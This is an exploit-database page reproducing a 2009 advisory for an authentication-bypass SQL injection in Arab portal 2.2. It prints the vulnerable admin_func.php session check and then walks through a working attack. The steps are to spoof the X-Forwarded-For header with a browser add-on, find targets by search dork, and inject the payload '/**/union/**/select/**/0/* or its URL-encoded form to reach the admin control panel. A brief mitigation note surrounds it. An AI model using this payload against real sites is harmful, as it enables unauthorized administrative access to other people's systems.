header-logo
Suggest Exploit
vendor:
Arab portal
by:
RoMaNcYxHaCkEr [RXH]
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Arab portal
Affected Version From: Arab portal 2.2
Affected Version To: Arab portal 2.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Arab portal 2.2 Remote Auth SQL Bypass Vulnerability

The vulnerability exists in the 'admin_func.php' file of the Arab portal 2.2 script. By injecting a specially crafted header, an attacker can bypass authentication and execute arbitrary SQL queries. The vulnerable code is located at line 192. An exploit for this vulnerability involves using the 'X-Forwarded-For Spoofer' tool to inject the client IP in the header.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by the vendor. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Script Name : Arab portal 2.2 Remote Auth SQL Bypass Vulnerabilitiy

# Script  home : http://www.arab-portal.info/arabportal_22.zip
# Exploit risk level : High
# Found By : RoMaNcYxHaCkEr  [RXH]        
# Written By : Sniper Code    [S.C.T - 443 ]
# Our home :  WwW.Sec-Code.CoM  [Security - Codes TeaM]   
+======================================================================================================================+

# Introduction About Vulne :

the Control Panel Is Depending on Session In MySQL Also By Cookies But by Default  it Is Session ...

See This Line 192 of this File [admin/aclass/admin_func.php]:

         $result  = $apt->query("SELECT sessIP from  rafia_admin_sess where  sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");

When You Injected The Header To Get XPL SQL Injection By Simple Injected And Success The Login In This SQL Query

# Vulne Line 192 In File [admin/aclass/admin_func.php]: :

function is_login()
     {
         global $apt;
        
         $sessID  = $this->get_sessID();
         $sessIP  = $apt->ip;
         $expsess = $apt->time + $this->expsess;

         if($this->use_pre_ip == 1){$r_ip = explode('.',$sessIP); $sessIP = $r_ip[0].'.'.$r_ip[1].'.'.$r_ip[2];}

         $result  = $apt->query("SELECT sessIP from  rafia_admin_sess where  sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");

         if ($apt->dbnumrows($result) > 0)
         {
                 $apt->query("update rafia_admin_sess set sess_TIME='".$apt->time."' where  sessID='$sessID'");
                return true;
         }
         else
         {
             return false;
         }
     }

we can exploit this . .

# and now the Exploit  is:

-First : Install This Tool :

https://addons.mozilla.org/en-US/firefox/addon/5948

it is [ X-Forwarded-For Spoofer tool]

You Can Inject Also Client-ip Also Is Infected In Header

-second : find site by using dork : plz use your mind ^_^

ok now Go To Admincp e.g. :

http://localhost/arabportal_22/admin/

http://sniper code/path/admin/

Then Write This Code In Tool [from Firefox ===> Tools====> X-Forwarded-for Spoofer]

put this code :
'/**/union/**/select/**/0/*

And  select Enable for tool . . .

Now Refresh Twice ..and you will be In admin Control Panel ^_^

I Am Tired For Written Exploit For This Bug ...

and You Can Code It,s . .

If You Have Problem With Magic_quat  in php version Encode To URL Like This :

%27%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%30%2F%2A

and also you will be in admin control panel. . . .
+================================================================================================================+

# Solution :

Protect The Admin cp By using Firewall Or Change The Login Manner :)

thats it . . .

[+]
done by :sniper code and rxh . .

[+] Greetz to :

           [»] The members in our home [  WwW.Sec-Code.CoM  - - ]
           [»] [Snake1095 - aLwHEeD - AlH7nOOtY - aB0-3tH4b T3rR0r - HXH - -]
           [»][MN9 - S4S-T3rr0r!sT -G0D-F4Th3r- SnIpEr_h - Cyb3R-1sT - siana - jiko - -]
           [+] [members of WwW.tryag.cc/cc - -]



-==========================================[ ViVa Crazy Coderz rxh - S.C.T ]====================================-

# milw0rm.com [2009-05-29]

Navigation

Suggest Exploit

Services By CQR